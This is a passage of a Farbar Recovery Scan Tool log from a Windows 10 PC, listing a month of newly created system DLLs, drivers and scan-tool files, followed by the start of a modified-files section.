2016-03-08 17:33 - 2016-03-08 17:34 - 00072040 _____ C:\Users\levilaing\Downloads\FRST.txt
2016-03-08 17:33 - 2016-03-08 17:33 - 02374144 _____ (Farbar) C:\Users\levilaing\Desktop\FRST64.exe
2016-03-08 17:29 - 2016-03-08 17:32 - 00000253 _____ C:\Users\levilaing\Downloads\Search.txt
2016-03-08 17:16 - 2016-03-09 19:47 - 00000000 ____D C:\FRST
2016-03-08 16:37 - 2016-03-08 16:38 - 00041639 _____ C:\Users\levilaing\Downloads\Addition.txt
2016-03-01 13:31 - 2016-03-01 13:31 - 00000860 _____ C:\WINDOWS\system32\Drivers\etc\hosts.bak
2016-03-01 13:26 - 2016-03-01 13:50 - 00000000 ____D C:\Users\levilaing\AppData\Local\NPE
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-03-01 12:58 - 2016-02-23 04:32 - 08705672 _____ (Microsoft Corp.) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-03-01 12:58 - 2016-02-23 04:31 - 00408120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2016-03-01 12:58 - 2016-02-23 04:21 - 22564328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-03-01 12:58 - 2016-02-23 03:45 - 02773096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2016-03-01 12:58 - 2016-02-23 03:38 - 06952088 _____ (Microsoft Corp.) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-03-01 12:58 - 2016-02-23 03:27 - 21124344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-03-01 12:58 - 2016-02-23 02:58 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2016-03-01 12:58 - 2016-02-23 02:29 - 00591872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2016-03-01 12:58 - 2016-02-23 02:28 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-03-01 12:58 - 2016-02-23 02:09 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-03-01 12:58 - 2016-02-23 02:00 - 02624512 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-03-01 12:58 - 2016-02-23 01:58 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-03-01 12:58 - 2016-02-23 01:30 - 01731584 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-03-01 12:58 - 2016-02-23 01:24 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-03-01 12:58 - 2016-02-23 00:52 - 11545600 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-03-01 12:58 - 2016-02-23 00:50 - 09919488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-03-01 12:58 - 2016-02-23 00:39 - 13382656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-03-01 12:58 - 2016-02-23 00:39 - 02581504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-03-01 12:58 - 2016-02-23 00:36 - 12125696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-03-01 12:58 - 2016-02-08 21:24 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-03-01 12:58 - 2016-02-08 21:04 - 01946624 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-03-01 12:57 - 2016-02-23 05:29 - 01030416 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-03-01 12:57 - 2016-02-23 05:29 - 00874968 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-03-01 12:57 - 2016-02-23 05:27 - 01317640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-03-01 12:57 - 2016-02-23 05:27 - 01141504 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-03-01 12:57 - 2016-02-23 05:25 - 02152288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-03-01 12:57 - 2016-02-23 05:25 - 01818696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-03-01 12:57 - 2016-02-23 05:25 - 00563552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2016-03-01 12:57 - 2016-02-23 05:15 - 00779384 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskschd.dll
2016-03-01 12:57 - 2016-02-23 05:08 - 00989536 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-03-01 12:57 - 2016-02-23 04:34 - 01859960 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-03-01 12:57 - 2016-02-23 04:34 - 01542816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-03-01 12:57 - 2016-02-23 04:33 - 00696160 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-03-01 12:57 - 2016-02-23 04:33 - 00389992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 02544264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 01152328 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 01062480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 00498448 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 00369912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2016-03-01 12:57 - 2016-02-23 04:31 - 01017032 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00819648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00536256 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00476728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2016-03-01 12:57 - 2016-02-23 04:25 - 03671888 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-03-01 12:57 - 2016-02-23 04:22 - 00572272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\taskschd.dll
2016-03-01 12:57 - 2016-02-23 04:17 - 00146272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
2016-03-01 12:57 - 2016-02-23 03:40 - 00430944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-03-01 12:57 - 2016-02-23 03:39 - 00502112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 02180136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00980352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00895080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00882720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00450912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00420928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2016-03-01 12:57 - 2016-02-23 03:37 - 00713824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:32 - 00791744 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-03-01 12:57 - 2016-02-23 03:30 - 02919320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-03-01 12:57 - 2016-02-23 03:27 - 00376536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll
2016-03-01 12:57 - 2016-02-23 03:25 - 00534368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2016-03-01 12:57 - 2016-02-23 03:20 - 01139712 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSave.dll
2016-03-01 12:57 - 2016-02-23 03:20 - 00238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2016-03-01 12:57 - 2016-02-23 03:19 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-03-01 12:57 - 2016-02-23 03:17 - 00649216 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-03-01 12:57 - 2016-02-23 03:12 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\provpackageapidll.dll
2016-03-01 12:57 - 2016-02-23 03:10 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2016-03-01 12:57 - 2016-02-23 03:07 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-03-01 12:57 - 2016-02-23 03:07 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2016-03-01 12:57 - 2016-02-23 03:06 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\flvprophandler.dll
2016-03-01 12:57 - 2016-02-23 03:01 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rasl2tp.sys
2016-03-01 12:57 - 2016-02-23 03:00 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll
2016-03-01 12:57 - 2016-02-23 03:00 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininetlui.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\irmon.dll
2016-03-01 12:57 - 2016-02-23 02:57 - 00199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-03-01 12:57 - 2016-02-23 02:56 - 02186864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2016-03-01 12:57 - 2016-02-23 02:55 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2016-03-01 12:57 - 2016-02-23 02:53 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\srpapi.dll
2016-03-01 12:57 - 2016-02-23 02:53 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-03-01 12:57 - 2016-02-23 02:52 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2016-03-01 12:57 - 2016-02-23 02:50 - 00159232 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-03-01 12:57 - 2016-02-23 02:48 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-03-01 12:57 - 2016-02-23 02:48 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerClient.dll
2016-03-01 12:57 - 2016-02-23 02:40 - 00074240 _____ (Microsoft Corporation) C:\WINDOWS\system32\SMSRouter.dll
2016-03-01 12:57 - 2016-02-23 02:39 - 00178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2016-03-01 12:57 - 2016-02-23 02:38 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSFlacDecoder.dll
2016-03-01 12:57 - 2016-02-23 02:38 - 00287712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MediaControl.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-03-01 12:57 - 2016-02-23 02:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\QuickActionsDataModel.dll
2016-03-01 12:57 - 2016-02-23 02:34 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifiprofilessettinghandler.dll
2016-03-01 12:57 - 2016-02-23 02:34 - 00189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2016-03-01 12:57 - 2016-02-23 02:33 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\system32\MBMediaManager.dll
2016-03-01 12:57 - 2016-02-23 02:32 - 00414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-03-01 12:57 - 2016-02-23 02:31 - 00463360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2016-03-01 12:57 - 2016-02-23 02:27 - 00307712 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll
2016-03-01 12:57 - 2016-02-23 02:26 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDEServer.exe
2016-03-01 12:57 - 2016-02-23 02:23 - 00412672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2016-03-01 12:57 - 2016-02-23 02:22 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00847360 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00606720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00493568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmkvsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00330240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-01 12:57 - 2016-02-23 02:19 - 00948736 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2016-03-01 12:57 - 2016-02-23 02:19 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2016-03-01 12:57 - 2016-02-23 02:18 - 00557056 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-03-01 12:57 - 2016-02-23 02:14 - 00828928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2016-03-01 12:57 - 2016-02-23 02:14 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2016-03-01 12:57 - 2016-02-23 02:12 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-03-01 12:57 - 2016-02-23 02:11 - 00587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-03-01 12:57 - 2016-02-23 02:10 - 00997376 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2016-03-01 12:57 - 2016-02-23 02:10 - 00474624 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-03-01 12:57 - 2016-02-23 02:09 - 00988160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-03-01 12:57 - 2016-02-23 02:09 - 00870400 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 01213440 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininetlui.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
2016-03-01 12:57 - 2016-02-23 02:05 - 00161280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-03-01 12:57 - 2016-02-23 02:04 - 01131520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2016-03-01 12:57 - 2016-02-23 02:04 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2016-03-01 12:57 - 2016-02-23 02:04 - 00382464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-03-01 12:57 - 2016-02-23 02:02 - 01318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-03-01 12:57 - 2016-02-23 02:02 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2016-03-01 12:57 - 2016-02-23 02:02 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2016-03-01 12:57 - 2016-02-23 01:58 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-03-01 12:57 - 2016-02-23 01:58 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerServer.dll
2016-03-01 12:57 - 2016-02-23 01:58 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2016-03-01 12:57 - 2016-02-23 01:57 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TimeBrokerClient.dll
2016-03-01 12:57 - 2016-02-23 01:52 - 00456704 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2016-03-01 12:57 - 2016-02-23 01:50 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSFlacDecoder.dll
2016-03-01 12:57 - 2016-02-23 01:49 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-03-01 12:57 - 2016-02-23 01:48 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2016-03-01 12:57 - 2016-02-23 01:47 - 00157184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2016-03-01 12:57 - 2016-02-23 01:38 - 00480256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 01118208 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 00613376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00713728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00379392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmkvsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-01 12:57 - 2016-02-23 01:35 - 00400896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2016-03-01 12:57 - 2016-02-23 01:31 - 00585216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2016-03-01 12:57 - 2016-02-23 01:30 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2016-03-01 12:57 - 2016-02-23 01:29 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-03-01 12:57 - 2016-02-23 01:28 - 00555520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncController.dll
2016-03-01 12:57 - 2016-02-23 01:28 - 00256512 _____ (Microsoft Corporation) C:\WINDOWS\system32\accountaccessor.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 04827136 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 01105920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 00489984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2016-03-01 12:57 - 2016-02-23 01:22 - 01944576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-03-01 12:57 - 2016-02-23 01:21 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-03-01 12:57 - 2016-02-23 01:21 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-03-01 12:57 - 2016-02-23 01:20 - 00083456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputLocaleManager.dll
2016-03-01 12:57 - 2016-02-23 01:17 - 02635264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-03-01 12:57 - 2016-02-23 01:14 - 00990720 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2016-03-01 12:57 - 2016-02-23 01:11 - 01390080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-03-01 12:57 - 2016-02-23 01:05 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll
2016-03-01 12:57 - 2016-02-23 01:01 - 02295808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2016-03-01 12:57 - 2016-02-23 00:59 - 01500672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-03-01 12:57 - 2016-02-23 00:58 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncController.dll
2016-03-01 12:57 - 2016-02-23 00:56 - 04412928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 04894208 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 02229760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-03-01 12:57 - 2016-02-23 00:53 - 01799168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-03-01 12:57 - 2016-02-23 00:51 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2016-03-01 12:57 - 2016-02-23 00:42 - 03425792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-03-01 12:57 - 2016-02-23 00:41 - 02912256 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2016-03-01 12:57 - 2016-02-23 00:36 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-03-01 12:57 - 2016-02-23 00:35 - 07533568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-03-01 12:57 - 2016-02-23 00:33 - 02604032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2016-03-01 12:57 - 2016-02-23 00:32 - 02793472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-03-01 12:57 - 2016-02-23 00:30 - 02061312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-03-01 12:57 - 2016-02-23 00:28 - 06740992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2016-03-01 12:57 - 2016-02-08 22:28 - 00277856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-03-01 12:57 - 2016-02-08 22:13 - 00185184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-03-01 12:57 - 2016-02-08 21:18 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\system32\thumbcache.dll
2016-03-01 12:57 - 2016-02-08 21:18 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2016-03-01 12:57 - 2016-02-08 21:07 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-03-01 12:57 - 2016-02-08 21:07 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2016-02-23 13:55 - 2016-02-23 13:55 - 00007238 _____ C:\Users\levilaing\Downloads\ACRB.txt
2016-02-16 17:08 - 2016-02-16 17:08 - 01046528 _____ C:\Users\levilaing\Downloads\MicrosoftFixit50848.msi
2016-02-12 13:50 - 2016-03-09 18:52 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-09 13:01 - 2016-01-29 00:57 - 04502352 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-02-09 13:01 - 2016-01-29 00:33 - 04064320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-02-09 13:01 - 2016-01-26 23:59 - 00304752 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2016-02-09 13:01 - 2016-01-26 23:57 - 01824264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-09 13:01 - 2016-01-26 23:57 - 00820704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-09 13:01 - 2016-01-26 23:55 - 00081112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpenWith.exe
2016-02-09 13:01 - 2016-01-26 23:46 - 02606824 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-09 13:01 - 2016-01-26 23:46 - 01270072 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-09 13:01 - 2016-01-26 23:44 - 00604928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-02-09 13:01 - 2016-01-26 23:44 - 00085320 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpenWith.exe
2016-02-09 13:01 - 2016-01-26 23:21 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-09 13:01 - 2016-01-26 23:15 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
2016-02-09 13:01 - 2016-01-26 23:11 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-09 13:01 - 2016-01-26 23:10 - 00099840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-09 13:01 - 2016-01-26 23:08 - 00299008 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-09 13:01 - 2016-01-26 23:08 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-02-09 13:01 - 2016-01-26 23:07 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iassam.dll
2016-02-09 13:01 - 2016-01-26 23:04 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-09 13:01 - 2016-01-26 23:02 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-09 13:01 - 2016-01-26 23:01 - 00792064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-09 13:01 - 2016-01-26 22:59 - 00258048 _____ (Microsoft Corporation) C:\WINDOWS\system32\iassam.dll
2016-02-09 13:01 - 2016-01-26 22:52 - 00970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-09 13:01 - 2016-01-26 22:50 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-09 13:01 - 2016-01-26 22:44 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cfgbkend.dll
2016-02-09 13:01 - 2016-01-26 22:42 - 01387520 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-02-09 13:01 - 2016-01-26 22:32 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-02-09 13:01 - 2016-01-26 22:31 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\cfgbkend.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-09 19:44 - 2013-09-13 15:32 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-03-09 19:39 - 2016-01-06 10:04 - 00000000 ____D C:\WINDOWS\System32\Tasks\Norton Security
2016-03-09 19:34 - 2015-09-01 10:45 - 00000000 __SHD C:\Users\levilaing\IntelGraphicsProfiles
